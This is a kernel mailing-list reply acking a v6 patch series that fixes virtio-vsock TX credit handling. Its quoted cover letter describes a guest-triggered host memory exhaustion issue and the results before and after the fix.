On Wed, Jan 21, 2026 at 10:36:24AM +0100, Stefano Garzarella wrote:
> The original series was posted by Melbin K Mathew <[email protected]> till v4.
> Since it's a real issue and the original author seems busy, I'm sending
> the new version fixing my comments but keeping the authorship (and restoring
> mine on patch 2 as reported on v4).


Acked-by: Michael S. Tsirkin <[email protected]>

> v6:
> - Rebased on net tree since there was a conflict on patch 4 with another
>   test added.
> - No code changes.
> 
> v5: 
> https://lore.kernel.org/netdev/[email protected]/
> v4: https://lore.kernel.org/netdev/[email protected]/
> 
> >From Melbin K Mathew <[email protected]>:
> 
> This series fixes TX credit handling in virtio-vsock:
> 
> Patch 1: Fix potential underflow in get_credit() using s64 arithmetic
> Patch 2: Fix vsock_test seqpacket bounds test
> Patch 3: Cap TX credit to local buffer size (security hardening)
> Patch 4: Add stream TX credit bounds regression test
> 
> The core issue is that a malicious guest can advertise a huge buffer
> size via SO_VM_SOCKETS_BUFFER_SIZE, causing the host to allocate
> excessive sk_buff memory when sending data to that guest.
> 
> On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with
> 32 guest vsock connections advertising 2 GiB each and reading slowly
> drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only
> recovered after killing the QEMU process.
> 
> With this series applied, the same PoC shows only ~35 MiB increase in
> Slab/SUnreclaim, no host OOM, and the guest remains responsive.
> 
> Melbin K Mathew (3):
>   vsock/virtio: fix potential underflow in virtio_transport_get_credit()
>   vsock/virtio: cap TX credit to local buffer size
>   vsock/test: add stream TX credit bounds test
> 
> Stefano Garzarella (1):
>   vsock/test: fix seqpacket message bounds test
> 
>  net/vmw_vsock/virtio_transport_common.c |  30 +++++--
>  tools/testing/vsock/vsock_test.c        | 112 ++++++++++++++++++++++++
>  2 files changed, 133 insertions(+), 9 deletions(-)
> 
> -- 
> 2.52.0


Reply via email to